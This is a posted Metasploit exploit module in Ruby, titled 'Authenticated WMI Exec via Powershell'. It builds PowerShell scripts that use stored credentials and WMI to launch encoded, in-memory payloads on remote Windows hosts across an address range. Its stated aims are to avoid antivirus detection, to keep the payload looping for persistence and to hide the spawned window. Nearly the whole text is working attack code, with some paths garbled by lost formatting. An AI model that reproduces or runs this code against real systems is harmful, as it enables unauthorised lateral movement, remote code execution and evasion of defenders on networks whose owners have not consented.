Authenticated WMI Exec Via Powershell
Posted on 17 November 2016
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/powershell' require 'msf/core/post/windows/priv' require 'msf/core/exploit/powershell/dot_net' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Windows::Powershell include Msf::Exploit::Powershell::DotNet include Msf::Post::Windows::Priv def initialize(info={}) super(update_info(info, 'Name' => "Authenticated WMI Exec via Powershell", 'Description' => %q{ This module uses WMI execution to launch a payload instance on a remote machine. In order to avoid AV detection, all execution is performed in memory via psh-net encoded payload. Persistence option can be set to keep the payload looping while a handler is present to receive it. By default the module runs as the current process owner. The module can be configured with credentials for the remote host with which to launch the process. }, 'License' => MSF_LICENSE, 'Author' => 'RageLtMan <rageltman[at]sempervictus>', 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 8192 }, 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Universal', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate'=> "Aug 19 2012" )) register_options( [ OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]), OptString.new('USERNAME', [false, "Username to authenticate as"]), OptString.new('PASSWORD', [false, "Password to authenticate with"]), OptString.new('DOMAIN', [false, "Domain or machine name"]), ], self.class) register_advanced_options( [ OptBool.new('PowerShellPersist', [false, 'Run the payload in a loop']), OptBool.new('RunRemoteWow64', [ false, 'Execute powershell in 32bit compatibility mode, payloads need native arch', false ]), ], self.class) end def build_script run_opts = {} run_opts[:username] = datastore['USERNAME'] run_opts[:domain] = datastore['DOMAIN'] || '.' run_opts[:password] = datastore['PASSWORD'] # End of file marker eof = Rex::Text.rand_text_alpha(8) env_suffix = Rex::Text.rand_text_alpha(8) # Create base64 encoded payload psh_payload_raw = Msf::Util::EXE.to_win32pe_psh_reflection(framework, payload.raw) if datastore['PowerShellPersist'] fun_name = Rex::Text.rand_text_alpha(rand(2)+2) sleep_time = rand(5)+5 psh_payload = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}" end psh_payload = compress_script(psh_payload_raw, eof) # WMI exec function - this is going into powershell.rb after pull 701 is commited script = ps_wmi_exec(run_opts) # Build WMI exec calls to every host into the script to reduce PS instances # Need to address arch compat issue here, check powershell.exe arch, check pay arch # split the hosts into wow64 and native, and run each range separately ps_bin = datastore['RunRemoteWow64'] ? 'cmd /c %windir%syswow64WindowsPowerShellv1.0powershell.exe' : 'powershell.exe' # for whatever reason, passing %systemroot% instead of 'C:windows' fails if datastore["RHOSTS"] # Iterate through our hosts list adding a call to the WMI wrapper for each. # This should learn to differentiate between hosts and call WOW64 as appropriate, # as well as putting the payload into a variable when many hosts are hit so the # uploaded script is not bloated since each encoded payload is bulky. Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |host| if run_opts[:username] and run_opts[:password] script << " New-RemoteProcess -rhost "#{host}" -login "#{run_opts[:domain]}\#{run_opts[:username]}"" script << " -pass '#{run_opts[:password]}' -cmd "#{ps_bin} -EncodedCommand #{psh_payload}";" else script << " New-RemoteProcess -rhost "#{host}" -cmd "#{ps_bin} -EncodedCommand #{psh_payload}";" end end else print_status('Running Locally') script = psh_payload_raw end return script end def exploit # Make sure we meet the requirements before running the script unless have_powershell? fail_with(Failure::BadConfig, 'PowerShell not found') end # SYSTEM doesnt have credentials on remote hosts if is_system? and datastore['RHOSTS'] print_error("Cannot run as local system on remote hosts") return 0 end script = build_script if datastore['Powershell::Post::dry_run'] print_good script return end begin psh_output = datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false) print_good(psh_output) rescue Rex::TimeoutError => e elog("#{e.class} #{e.message} #{e.backtrace * " "}") end vprint_good('PSH WMI exec is complete.') end # Wrapper function for instantiating a WMI win32_process # class object in powershell. # Insantiates the [wmiclass] object and configures the scope # Sets impersonation level and injects credentials as needed # Configures application startup options to hide the newly # created window. Adds start-up check for remote proc. def ps_wmi_exec(opts = {}) ps_wrapper = <<EOS Function New-RemoteProcess { Param([string]$rhost,[string]$cmd,[string]$login,[string]$pass) $ErrorActionPreference="SilentlyContinue" $proc = [WMIClass]"\\$rhost\root\cimv2:Win32_Process" EOS if opts[:username] and opts[:password] ps_wrapper += <<EOS $proc.psbase.Scope.Options.userName = $login $proc.psbase.Scope.Options.Password = $pass EOS end ps_wrapper += <<EOS $proc.psbase.Scope.Options.Impersonation = [System.Management.ImpersonationLevel]::Impersonate $proc.psbase.Scope.Options.Authentication = [System.Management.AuthenticationLevel]::PacketPrivacy $startup = [wmiclass]"Win32_ProcessStartup" $startup.Properties['ShowWindow'].value=$False $remote = $proc.Create($cmd,'C:\',$startup) if ($remote.returnvalue -eq 0) { Write-Host "Successfully launched on $rhost with a process id of" $remote.processid } else { Write-Host "Failed to launch on $rhost. ReturnValue is" $remote.ReturnValue } } EOS return ps_wrapper end end # # Ideally the methods to create WMI wrapper functions and their callers # should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb. #